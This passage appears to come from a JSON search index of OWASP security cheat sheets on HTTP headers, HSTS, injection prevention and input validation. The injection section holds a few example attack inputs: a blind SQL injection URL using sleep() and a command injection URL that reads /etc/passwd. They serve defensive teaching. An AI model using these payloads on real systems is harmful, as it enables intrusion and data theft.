The sample code below sets the X-Frame-Options header in PHP.

header(\"X-Frame-Options: DENY\");\n
"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#apache","title":"Apache","text":"

Below is an .htaccess sample configuration which sets the X-Frame-Options header in Apache.

<IfModule mod_headers.c>\nHeader set X-Frame-Options \"DENY\"\n</IfModule>\n
"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#iis","title":"IIS","text":"

Add configurations below to your Web.config in IIS to send the X-Frame-Options header.

<system.webServer>\n...\n <httpProtocol>\n<customHeaders>\n<add name=\"X-Frame-Options\" value=\"DENY\" />\n</customHeaders>\n</httpProtocol>\n...\n</system.webServer>\n
"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#haproxy","title":"HAProxy","text":"

Add the line below to your front-end, listen, or backend configurations to send the X-Frame-Options header.

http-response set-header X-Frame-Options DENY\n
"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#nginx","title":"Nginx","text":"

Below is a sample configuration, it sets the X-Frame-Options header in Nginx.

add_header \"X-Frame-Options\" \"DENY\";\n
"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#express","title":"Express","text":"

You can use helmet to setup HTTP headers in Express. The code below is sample for adding the X-Frame-Options header.

const helmet = require('helmet');\nconst app = express();\n// Sets \"X-Frame-Options: SAMEORIGIN\"\napp.use(\nhelmet.frameguard({\naction: \"sameorigin\",\n})\n);\n
"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#testing-proper-implementation-of-security-headers","title":"Testing Proper Implementation of Security Headers","text":""},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#mozilla-observatory","title":"Mozilla Observatory","text":"

The Mozilla Observatory is an online tool which helps you to check your website's header status.

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#smartscanner","title":"SmartScanner","text":"

SmartScanner has a dedicated test profile for testing security of HTTP headers. Online tools usually test the homepage of the given address. But SmartScanner scans the whole website. So, you can make sure all of your web pages have the right HTTP Headers in place.

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#references","title":"References","text":""},{"location":"cheatsheets/HTTP_Strict_Transport_Security_Cheat_Sheet.html","title":"HTTP Strict Transport Security Cheat Sheet","text":""},{"location":"cheatsheets/HTTP_Strict_Transport_Security_Cheat_Sheet.html#introduction","title":"Introduction","text":"

HTTP Strict Transport Security (also named HSTS) is an opt-in security enhancement that is specified by a web application through the use of a special response header. Once a supported browser receives this header that browser will prevent any communications from being sent over HTTP to the specified domain and will instead send all communications over HTTPS. It also prevents HTTPS click through prompts on browsers.

The specification has been released and published end of 2012 as RFC 6797 (HTTP Strict Transport Security (HSTS)) by the IETF.

"},{"location":"cheatsheets/HTTP_Strict_Transport_Security_Cheat_Sheet.html#threats","title":"Threats","text":"

HSTS addresses the following threats:

"},{"location":"cheatsheets/HTTP_Strict_Transport_Security_Cheat_Sheet.html#examples","title":"Examples","text":"

Simple example, using a long (1 year = 31536000 seconds) max-age. This example is dangerous since it lacks includeSubDomains:

Strict-Transport-Security:\u00a0max-age=31536000

This example is useful if all present and future subdomains will be HTTPS. This is a more secure option but will block access to certain pages that can only be served over HTTP:

Strict-Transport-Security:\u00a0max-age=31536000;\u00a0includeSubDomains

This example is useful if all present and future subdomains will be HTTPS. In this example we set a very short max-age in case of mistakes during initial rollout:

Strict-Transport-Security:\u00a0max-age=86400;\u00a0includeSubDomains

Recommended:

Strict-Transport-Security:\u00a0max-age=31536000;\u00a0includeSubDomains;\u00a0preload

The preload flag indicates the site owner's consent to have their domain preloaded. The site owner still needs to then go and submit the domain to the list.

"},{"location":"cheatsheets/HTTP_Strict_Transport_Security_Cheat_Sheet.html#problems","title":"Problems","text":"

Site owners can use HSTS to identify users without cookies. This can lead to a significant privacy leak. Take a look here for more details.

Cookies can be manipulated from sub-domains, so omitting the includeSubDomains option permits a broad range of cookie-related attacks that HSTS would otherwise prevent by requiring a valid certificate for a subdomain. Ensuring the secure flag is set on all cookies will also prevent, some, but not all, of the same attacks.

"},{"location":"cheatsheets/HTTP_Strict_Transport_Security_Cheat_Sheet.html#browser-support","title":"Browser Support","text":"

As of September 2019 HSTS is supported by all modern browsers, with the only notable exception being Opera Mini.

"},{"location":"cheatsheets/HTTP_Strict_Transport_Security_Cheat_Sheet.html#references","title":"References","text":""},{"location":"cheatsheets/Infrastructure_as_Code_Security_Cheat_Sheet.html","title":"Infrastructure as Code Security","text":""},{"location":"cheatsheets/Infrastructure_as_Code_Security_Cheat_Sheet.html#infrastructure-as-code-security-cheatsheet","title":"Infrastructure as Code Security Cheatsheet","text":""},{"location":"cheatsheets/Infrastructure_as_Code_Security_Cheat_Sheet.html#introduction","title":"Introduction","text":"

Infrastructure as code (IaC), also known as software-defined infrastructure, allows the configuration and deployment of infrastructure components faster with consistency by allowing them to be defined as a code and also enables repeatable deployments across environments.

"},{"location":"cheatsheets/Infrastructure_as_Code_Security_Cheat_Sheet.html#security-best-practices","title":"Security best practices","text":"

Here are some of the security best practices for IaC that can be easily integrated into the Software Development Lifecycle:

"},{"location":"cheatsheets/Infrastructure_as_Code_Security_Cheat_Sheet.html#develop-and-distribute","title":"Develop and Distribute","text":""},{"location":"cheatsheets/Infrastructure_as_Code_Security_Cheat_Sheet.html#deploy","title":"Deploy","text":""},{"location":"cheatsheets/Infrastructure_as_Code_Security_Cheat_Sheet.html#runtime","title":"Runtime","text":""},{"location":"cheatsheets/Infrastructure_as_Code_Security_Cheat_Sheet.html#references","title":"References","text":""},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html","title":"Injection Prevention Cheat Sheet","text":""},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#introduction","title":"Introduction","text":"

This article is focused on providing clear, simple, actionable guidance for preventing the entire category of Injection flaws in your applications. Injection attacks, especially SQL Injection, are unfortunately very common.

Application accessibility is a very important factor in protection and prevention of injection flaws. Only the minority of all applications within a company/enterprise are developed in house, where as most applications are from external sources. Open source applications give at least the opportunity to fix problems, but closed source applications need a different approach to injection flaws.

Injection flaws occur when an application sends untrusted data to an interpreter. Injection flaws are very prevalent, particularly in legacy code, often found in SQL queries, LDAP queries, XPath queries, OS commands, program arguments, etc. Injection flaws are easy to discover when examining code, but more difficult via testing. Scanners and fuzzers can help attackers find them.

Depending on the accessibility different actions must be taken in order to fix them. It is always the best way to fix the problem in source code itself, or even redesign some parts of the applications. But if the source code is not available or it is simply uneconomical to fix legacy software only virtual patching makes sense.

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#application-types","title":"Application Types","text":"

Three classes of applications can usually be seen within a company. Those 3 types are needed to identify the actions which need to take place in order to prevent/fix injection flaws.

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#a1-new-application","title":"A1: New Application","text":"

A new web application in the design phase, or in early stage development.

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#a2-productive-open-source-application","title":"A2: Productive Open Source Application","text":"

An already productive application, which can be easily adapted. A Model-View-Controller (MVC) type application is just one example of having a easily accessible application architecture.

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#a3-productive-closed-source-application","title":"A3: Productive Closed Source Application","text":"

A productive application which cannot or only with difficulty be modified.

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#forms-of-injection","title":"Forms of Injection","text":"

There are several forms of injection targeting different technologies including SQL queries, LDAP queries, XPath queries and OS commands.

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#query-languages","title":"Query languages","text":"

The most famous form of injection is SQL Injection where an attacker can modify existing database queries. For more information see the SQL Injection Prevention Cheat Sheet.

But also LDAP, SOAP, XPath and REST based queries can be susceptible to injection attacks allowing for data retrieval or control bypass.

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#sql-injection","title":"SQL Injection","text":"

An SQL injection attack consists of insertion or \"injection\" of either a partial or complete SQL query via the data input or transmitted from the client (browser) to the web application.

A successful SQL injection attack can read sensitive data from the database, modify database data (insert/update/delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file existing on the DBMS file system or write files into the file system, and, in some cases, issue commands to the operating system. SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to affect the execution of predefined SQL commands.

SQL Injection attacks can be divided into the following three classes:

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#how-to-test-for-the-issue","title":"How to test for the issue","text":""},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#during-code-review","title":"During code review","text":"

please check for any queries to the database are not done via prepared statements.

If dynamic statements are being made please check if the data is sanitized before used as par of the statement.

Auditors should always look for uses of sp_execute, execute or exec within SQL Server stored procedures. Similar audit guidelines are necessary for similar functions for other vendors.

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#automated-exploitation","title":"Automated Exploitation","text":"

Most of the situation and techniques below here can be performed in a automated way using some tools. In this article the tester can find information how to perform an automated auditing using SQLMap

Equally Static Code Analysis Data flow rules can detect of unsanitized user controlled input can change the SQL query.

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#stored-procedure-injection","title":"Stored Procedure Injection","text":"

When using dynamic SQL within a stored procedure, the application must properly sanitize the user input to eliminate the risk of code injection. If not sanitized, the user could enter malicious SQL that will be executed within the stored procedure.

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#time-delay-exploitation-technique","title":"Time delay Exploitation technique","text":"

The time delay exploitation technique is very useful when the tester find a Blind SQL Injection situation, in which nothing is known on the outcome of an operation. This technique consists in sending an injected query and in case the conditional is true, the tester can monitor the time taken to for the server to respond. If there is a delay, the tester can assume the result of the conditional query is true. This exploitation technique can be different from DBMS to DBMS (check DBMS specific section).

http://www.example.com/product.php?id=10 AND IF(version() like '5%', sleep(10), 'false'))--\n

In this example the tester is checking whether the MySql version is 5.x or not, making the server delay the answer by 10 seconds. The tester can increase the delay time and monitor the responses. The tester also doesn't need to wait for the response. Sometimes they can set a very high value (e.g. 100) and cancel the request after some seconds.

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#out-of-band-exploitation-technique","title":"Out of band Exploitation technique","text":"

This technique is very useful when the tester find a Blind SQL Injection situation, in which nothing is known on the outcome of an operation. The technique consists of the use of DBMS functions to perform an out of band connection and deliver the results of the injected query as part of the request to the tester's server. Like the error based techniques, each DBMS has its own functions. Check for specific DBMS section.

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#remediation","title":"Remediation","text":""},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#defense-option-1-prepared-statements-with-parameterized-queries","title":"Defense Option 1: Prepared Statements (with Parameterized Queries)","text":"

Prepared statements ensure that an attacker is not able to change the intent of a query, even if SQL commands are inserted by an attacker. In the safe example below, if an attacker were to enter the userID of tom' or '1'='1, the parameterized query would not be vulnerable and would instead look for a username which literally matched the entire string tom' or '1'='1.

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#defense-option-2-stored-procedures","title":"Defense Option 2: Stored Procedures","text":"

The difference between prepared statements and stored procedures is that the SQL code for a stored procedure is defined and stored in the database itself, and then called from the application.

Both of these techniques have the same effectiveness in preventing SQL injection so your organization should choose which approach makes the most sense for you. Stored procedures are not always safe from SQL injection. However, certain standard stored procedure programming constructs have the same effect as the use of parameterized queries when implemented safely* which is the norm for most stored procedure languages.

Note: 'Implemented safely' means the stored procedure does not include any unsafe dynamic SQL generation.

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#defense-option-3-allow-list-input-validation","title":"Defense Option 3: Allow-List Input Validation","text":"

Various parts of SQL queries aren't legal locations for the use of bind variables, such as the names of tables or columns, and the sort order indicator (ASC or DESC). In such situations, input validation or query redesign is the most appropriate defense. For the names of tables or columns, ideally those values come from the code, and not from user parameters.

But if user parameter values are used to make different for table names and column names, then the parameter values should be mapped to the legal/expected table or column names to make sure unvalidated user input doesn't end up in the query. Please note, this is a symptom of poor design and a full rewrite should be considered if time allows.

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#defense-option-4-escaping-all-user-supplied-input","title":"Defense Option 4: Escaping All User-Supplied Input","text":"

This technique should only be used as a last resort, when none of the above are feasible. Input validation is probably a better choice as this methodology is frail compared to other defenses and we cannot guarantee it will prevent all SQL Injection in all situations.

This technique is to escape user input before putting it in a query. It's usually only recommended to retrofit legacy code when implementing input validation isn't cost effective.

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#example-code-java","title":"Example code - Java","text":""},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#safe-java-prepared-statement-example","title":"Safe Java Prepared Statement Example","text":"

The following code example uses a PreparedStatement, Java's implementation of a parameterized query, to execute the same database query.

// This should REALLY be validated too\nString custname = request.getParameter(\"customerName\");\n// Perform input validation to detect attacks\nString query = \"SELECT account_balance FROM user_data WHERE user_name = ?\";\nPreparedStatement pstmt = connection.prepareStatement(query);\npstmt.setString(1, custname);\nResultSet results = pstmt.executeQuery();\n

We have shown examples in Java, but practically all other languages, including Cold Fusion, and Classic ASP, support parameterized query interfaces.

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#safe-java-stored-procedure-example","title":"Safe Java Stored Procedure Example","text":"

The following code example uses a CallableStatement, Java's implementation of the stored procedure interface, to execute the same database query. The sp_getAccountBalance stored procedure would have to be predefined in the database and implement the same functionality as the query defined above.

// This should REALLY be validated\nString custname = request.getParameter(\"customerName\");\ntry {\nCallableStatement cs = connection.prepareCall(\"{call sp_getAccountBalance(?)}\");\ncs.setString(1, custname);\nResultSet results = cs.executeQuery();\n// Result set handling...\n} catch (SQLException se) {\n// Logging and error handling...\n}\n
"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#ldap-injection","title":"LDAP Injection","text":"

LDAP Injection is an attack used to exploit web based applications that construct LDAP statements based on user input. When an application fails to properly sanitize user input, it's possible to modify LDAP statements through techniques similar to\u00a0SQL Injection. LDAP injection attacks could result in the granting of permissions to unauthorized queries, and content modification inside the LDAP tree. For more information on LDAP Injection attacks, visit\u00a0LDAP injection.

LDAP injection\u00a0attacks are common due to two factors:

  1. The lack of safer, parameterized LDAP query interfaces
  2. The widespread use of LDAP to authenticate users to systems.
"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#how-to-test-for-the-issue_1","title":"How to test for the issue","text":""},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#during-code-review_1","title":"During code review","text":"

Please check for any queries to the LDAP escape special characters, see here.

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#automated-exploitation_1","title":"Automated Exploitation","text":"

Scanner module of tool like OWASP ZAP have module to detect LDAP injection issue.

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#remediation_1","title":"Remediation","text":""},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#escape-all-variables-using-the-right-ldap-encoding-function","title":"Escape all variables using the right LDAP encoding function","text":"

The main way LDAP stores names is based on DN (distinguished name). You can think of this like a unique identifier. These are sometimes used to access resources, like a username.

A DN might look like this

cn=Richard Feynman, ou=Physics Department, dc=Caltech, dc=edu\n

or

uid=inewton, ou=Mathematics Department, dc=Cambridge, dc=com\n

There are certain characters that are considered special characters in a DN. The exhaustive list is the following: \\ # + < > , ; \" = and leading or trailing spaces

Each DN points to exactly 1 entry, which can be thought of sort of like a row in a RDBMS. For each entry, there will be 1 or more attributes which are analogous to RDBMS columns. If you are interested in searching through LDAP for users will certain attributes, you may do so with search filters. In a search filter, you can use standard boolean logic to get a list of users matching an arbitrary constraint. Search filters are written in Polish notation AKA prefix notation.

Example:

(&(ou=Physics)(| (manager=cn=Freeman Dyson,ou=Physics,dc=Caltech,dc=edu)\n(manager=cn=Albert Einstein,ou=Physics,dc=Princeton,dc=edu) ))\n

When building LDAP queries in application code, you MUST escape any untrusted data that is added to any LDAP query. There are two forms of LDAP escaping. Encoding for LDAP Search and Encoding for LDAP DN (distinguished name). The proper escaping depends on whether you are sanitizing input for a search filter, or you are using a DN as a username-like credential for accessing some resource.

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#example-code-java_1","title":"Example code - Java","text":""},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#safe-java-for-ldap-escaping-example","title":"Safe Java for LDAP escaping Example","text":"
public String escapeDN (String name) {\n//From RFC 2253 and the / character for JNDI\nfinal char[] META_CHARS = {'+', '\"', '<', '>', ';', '/'};\nString escapedStr = new String(name);\n//Backslash is both a Java and an LDAP escape character,\n//so escape it first\nescapedStr = escapedStr.replaceAll(\"\\\\\\\\\\\\\\\\\",\"\\\\\\\\\\\\\\\\\");\n//Positional characters - see RFC 2253\nescapedStr = escapedStr.replaceAll(\"\\^#\",\"\\\\\\\\\\\\\\\\#\");\nescapedStr = escapedStr.replaceAll(\"\\^ | $\",\"\\\\\\\\\\\\\\\\ \");\nfor (int i=0 ; i < META_CHARS.length ; i++) {\nescapedStr = escapedStr.replaceAll(\"\\\\\\\\\" +\nMETA_CHARS[i],\"\\\\\\\\\\\\\\\\\" + META_CHARS[i]);\n}\nreturn escapedStr;\n}\n

Note, that the backslash character is a Java String literal and a regular expression escape character.

public String escapeSearchFilter (String filter) {\n//From RFC 2254\nString escapedStr = new String(filter);\nescapedStr = escapedStr.replaceAll(\"\\\\\\\\\\\\\\\\\",\"\\\\\\\\\\\\\\\\5c\");\nescapedStr = escapedStr.replaceAll(\"\\\\\\\\\\*\",\"\\\\\\\\\\\\\\\\2a\");\nescapedStr = escapedStr.replaceAll(\"\\\\\\\\(\",\"\\\\\\\\\\\\\\\\28\");\nescapedStr = escapedStr.replaceAll(\"\\\\\\\\)\",\"\\\\\\\\\\\\\\\\29\");\nescapedStr = escapedStr.replaceAll(\"\\\\\\\\\" +\nCharacter.toString('\\\\u0000'), \"\\\\\\\\\\\\\\\\00\");\nreturn escapedStr;\n}\n
"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#xpath-injection","title":"XPath Injection","text":"

TODO

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#scripting-languages","title":"Scripting languages","text":"

All scripting languages used in web applications have a form of an eval call which receives code at runtime and executes it. If code is crafted using unvalidated and unescaped user input code injection can occur which allows an attacker to subvert application logic and eventually to gain local access.

Every time a scripting language is used, the actual implementation of the 'higher' scripting language is done using a 'lower' language like C. If the scripting language has a flaw in the data handling code 'Null Byte Injection' attack vectors can be deployed to gain access to other areas in memory, which results in a successful attack.

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#operating-system-commands","title":"Operating System Commands","text":"

OS command injection is a technique used via a web interface in order to execute OS commands on a web server. The user supplies operating system commands through a web interface in order to execute OS commands.

Any web interface that is not properly sanitized is subject to this exploit. With the ability to execute OS commands, the user can upload malicious programs or even obtain passwords. OS command injection is preventable when security is emphasized during the design and development of applications.

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#how-to-test-for-the-issue_2","title":"How to test for the issue","text":""},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#during-code-review_2","title":"During code review","text":"

Check if any command execute methods are called and in unvalidated user input are taken as data for that command.

Out side of that, appending a semicolon to the end of a URL query parameter followed by an operating system command, will execute the command. %3B is URL encoded and decodes to semicolon. This is because the ; is interpreted as a command separator.

Example: http://sensitive/something.php?dir=%3Bcat%20/etc/passwd

If the application responds with the output of the /etc/passwd file then you know the attack has been successful. Many web application scanners can be used to test for this attack as they inject variations of command injections and test the response.

Equally Static Code Analysis tools check the data flow of untrusted user input into a web application and check if the data is then entered into a dangerous method which executes the user input as a command.

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#remediation_2","title":"Remediation","text":"

If it is considered unavoidable the call to a system command incorporated with user-supplied, the following two layers of defense should be used within software in order to prevent attacks

  1. Parameterization\u00a0- If available, use structured mechanisms that automatically enforce the separation between data and command. These mechanisms can help to provide the relevant quoting, encoding.
  2. Input validation\u00a0- the values for commands and the relevant arguments should be both validated. There are different degrees of validation for the actual command and its arguments:

^[a-z0-9]{3,10}$

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#example-code-java_2","title":"Example code - Java","text":""},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#incorrect-usage","title":"Incorrect Usage","text":"
ProcessBuilder b = new ProcessBuilder(\"C:\\DoStuff.exe -arg1 -arg2\");\n

In this example, the command together with the arguments are passed as a one string, making easy to manipulate that expression and inject malicious strings.

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#correct-usage","title":"Correct Usage","text":"

Here is an example that starts a process with a modified working directory. The command and each of the arguments are passed separately. This make it easy to validated each term and reduces the risk to insert malicious strings.

ProcessBuilder pb = new ProcessBuilder(\"TrustedCmd\", \"TrustedArg1\", \"TrustedArg2\");\nMap<String, String> env = pb.environment();\npb.directory(new File(\"TrustedDir\"));\nProcess p = pb.start();\n
"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#network-protocols","title":"Network Protocols","text":"

Web applications often communicate with network daemons (like SMTP, IMAP, FTP) where user input becomes part of the communication stream. Here it is possible to inject command sequences to abuse an established session.

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#injection-prevention-rules","title":"Injection Prevention Rules","text":""},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#rule-1-perform-proper-input-validation","title":"Rule #1 (Perform proper input validation)","text":"

Perform proper input validation. Positive or \"allow list\" input validation with appropriate canonicalization is also recommended, but is not a complete defense as many applications require special characters in their input.

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#rule-2-use-a-safe-api","title":"Rule #2 (Use a safe API)","text":"

The preferred option is to use a safe API which avoids the use of the interpreter entirely or provides a parameterized interface. Be careful of APIs, such as stored procedures, that are parameterized, but can still introduce injection under the hood.

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#rule-3-contextually-escape-user-data","title":"Rule #3 (Contextually escape user data)","text":"

If a parameterized API is not available, you should carefully escape special characters using the specific escape syntax for that interpreter.

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#other-injection-cheatsheets","title":"Other Injection Cheatsheets","text":"

SQL Injection Prevention Cheat Sheet

OS Command Injection Defense Cheat Sheet

LDAP Injection Prevention Cheat Sheet

Injection Prevention Cheat Sheet in Java

"},{"location":"cheatsheets/Injection_Prevention_in_Java_Cheat_Sheet.html","title":"Injection Prevention Cheat Sheet in Java","text":"

This information has been moved to the dedicated Java Security CheatSheet

"},{"location":"cheatsheets/Input_Validation_Cheat_Sheet.html","title":"Input Validation Cheat Sheet","text":""},{"location":"cheatsheets/Input_Validation_Cheat_Sheet.html#introduction","title":"Introduction","text":"

This article is focused on providing clear, simple, actionable guidance for providing Input Validation security functionality in your applications.

"},{"location":"cheatsheets/Input_Validation_Cheat_Sheet.html#goals-of-input-validation","title":"Goals of Input Validation","text":"

Input validation is performed to ensure only properly formed data is entering the workflow in an information system, preventing malformed data from persisting in the database and triggering malfunction of various downstream components. Input validation should happen as early as possible in the data flow, preferably as soon as the data is received from the external party.

Data from all potentially untrusted sources should be subject to input validation, including not only Internet-facing web clients but also backend feeds over extranets, from suppliers, partners, vendors or regulators, each of which may be compromised on their own and start sending malformed data.

Input Validation should not be used as the primary method of preventing XSS, SQL Injection and other attacks which are covered in respective cheat sheets but can significantly contribute to reducing their impact if implemented properly.

"},{"location":"cheatsheets/Input_Validation_Cheat_Sheet.html#input-validation-strategies","title":"Input validation strategies","text":"

Input validation should be applied on both syntactical and Semantic level.

Syntactic validation should enforce correct syntax of structured fields (e.g. SSN, date, currency symbol).

Semantic validation should enforce correctness of their values in the specific business context (e.g. start date is before end date, price is within expected range).

It is always recommended to prevent attacks as early as possible in the processing of the user's (attacker's) request. Input validation can be used to detect unauthorized input before it is processed by the application.

"},{"location":"cheatsheets/Input_Validation_Cheat_Sheet.html#implementing-input-validation","title":"Implementing input validation","text":"

Input validation can be implemented using any programming technique that allows effective enforcement of syntactic and semantic correctness, for example:

"},{"location":"cheatsheets/Input_Validation_Cheat_Sheet.html#allow-list-vs-block-list","title":"Allow list vs block list","text":"

It is a common mistake to use block list validation in order to try to detect possibly dangerous characters and patterns like the apostrophe ' character, the string 1=1, or the <script> tag, but this is a massively flawed approach as it is trivial for an attacker to bypass such filters.

Plus, such filters frequently prevent authorized input, like O'Brian, where the ' character is fully legitimate. For more information on XSS filter evasion please see this wiki page.

Allow list validation is appropriate for all input fields provided by the user. Allow list validation involves defining exactly what IS authorized, and by definition, everything else is not authorized.

If it's well structured data, like dates, social security numbers, zip codes, email addresses, etc. then the developer should be able to define a very strong validation pattern, usually based on regular expressions, for validating such input.

If the input field comes from a fixed set of options, like a drop down list or radio buttons, then the input needs to match exactly one of the values offered to the user in the first place.

"},{"location":"cheatsheets/Input_Validation_Cheat_Sheet.html#validating-free-form-unicode-text","title":"Validating free-form Unicode text","text":"

Free-form text, especially with Unicode characters, is perceived as difficult to validate due to a relatively large space of characters that need to be allowed.

It's also free-form text input that highlights the importance of proper context-aware output encoding and quite clearly demonstrates that input validation is not the primary safeguards against Cross-Site Scripting. If your users want to type apostrophe ' or less-than sign < in their comment field, they might have perfectly legitimate reason for that and the application's job is to properly handle it throughout the whole life cycle of the data.

The primary means of input validation for free-form text input should be:

References:

"},{"location":"cheatsheets/Input_Validation_Cheat_Sheet.html#regular-expressions","title":"Regular expressions","text":"

Developing regular expressions can be complicated, and is well beyond the scope of this cheat sheet.

There are lots of resources on the internet about how to write regular expressions, including this site and the OWASP Validation Regex Repository.

When designing regular expression, be aware of RegEx Denial of Service (ReDoS) attacks. These attacks cause a program using a poorly designed Regular Expression to operate very slowly and utilize CPU resources for a very long time.

In summary, input validation should:

"},{"location":"cheatsheets/Input_Validation_Cheat_Sheet.html#allow-list-regular-expression-examples","title":"Allow List Regular Expression Examples","text":"

Validating a U.S. Zip Code (5 digits plus optional -4)

^\\d{5}(-\\d{4})?$\n

Validating U.S. State Selection From a Drop-Down Menu

^(AA|AE|AP|AL|AK|AS|AZ|AR|CA|CO|CT|DE|DC|FM|FL|GA|GU|\nHI|ID|IL|IN|IA|KS|KY|LA|ME|MH|MD|MA|MI|MN|MS|MO|MT|NE|\nNV|NH|NJ|NM|NY|NC|ND|MP|OH|OK|OR|PW|PA|PR|RI|SC|SD|TN|\nTX|UT|VT|VI|VA|WA|WV|WI|WY)$\n

Java Regex Usage Example:

Example\u00a0validating\u00a0the\u00a0parameter\u00a0\"zip\"\u00a0using\u00a0a\u00a0regular\u00a0expression.

private\u00a0static\u00a0final\u00a0Pattern\u00a0zipPattern\u00a0=\u00a0Pattern.compile(\"^\\d{5}(-\\d{4})?$\");\n\npublic\u00a0void\u00a0doPost(\u00a0HttpServletRequest\u00a0request,\u00a0HttpServletResponse\u00a0response)\u00a0{\ntry\u00a0{\nString\u00a0zipCode\u00a0=\u00a0request.getParameter(\u00a0\"zip\"\u00a0);\nif\u00a0(\u00a0!zipPattern.matcher(\u00a0zipCode\u00a0).matches()\u00a0\u00a0{\nthrow\u00a0new\u00a0YourValidationException(\u00a0\"Improper\u00a0zipcode\u00a0format.\"\u00a0);\n}\n//\u00a0do\u00a0what\u00a0you\u00a0want\u00a0here,\u00a0after\u00a0its\u00a0been\u00a0validated\u00a0..\n}\u00a0catch(YourValidationException\u00a0e\u00a0)\u00a0{\nresponse.sendError(\u00a0response.SC_BAD_REQUEST,\u00a0e.getMessage()\u00a0);\n}\n}\n

Some Allow list validators have also been predefined in various open source packages that you can leverage. For example:

"},{"location":"cheatsheets/Input_Validation_Cheat_Sheet.html#client-side-vs-server-side-validation","title":"Client Side vs Server Side Validation","text":"

Be aware that any JavaScript input validation performed on the client can be bypassed by an attacker that disables JavaScript or uses a Web Proxy. Ensure that any input validation performed on the client is also performed on the server.

"},{"location":"cheatsheets/Input_Validation_Cheat_Sheet.html#validating-rich-user-content","title":"Validating Rich User Content","text":"

It is very difficult to validate rich content submitted by a user. For more information, please see the XSS cheatsheet on Sanitizing HTML Markup with a Library Designed for the Job.

"},{"location":"cheatsheets/Input_Validation_Cheat_Sheet.html#preventing-xss-and-content-security-policy","title":"Preventing XSS and Content Security Policy","text":"

All user data controlled must be encoded when returned in the HTML page to prevent the execution of malicious data (e.g. XSS). For example <script> would be returned as &lt;script&gt;

The type of encoding is specific to the context of the page where the user controlled data is inserted. For example, HTML entity encoding is appropriate for data placed into the HTML body. However, user data placed into a script would need JavaScript specific output encoding.

Detailed information on XSS prevention here: OWASP XSS Prevention Cheat Sheet

"},{"location":"cheatsheets/Input_Validation_Cheat_Sheet.html#file-upload-validation","title":"File Upload Validation","text":"

Many websites allow users to upload files, such as a profile picture or more. This section helps provide that feature securely.

Check the File Upload Cheat Sheet.

"},{"location":"cheatsheets/Input_Validation_Cheat_Sheet.html#upload-verification","title":"Upload Verification","text":""},{"location":"cheatsheets/Input_Validation_Cheat_Sheet.html#upload-storage","title":"Upload Storage","text":""},{"location":"cheatsheets/Input_Validation_Cheat_Sheet.html#public-serving-of-uploaded-content","title":"Public Serving of Uploaded Content","text":""},{"location":"cheatsheets/Input_Validation_Cheat_Sheet.html#beware-of-special-files","title":"Beware of \"special\" files","text":"

The upload feature should be using an allow-list approach to only allow specific file types and extensions. However, it is important to be aware of the following file types that, if allowed, could result in security vulnerabilities:

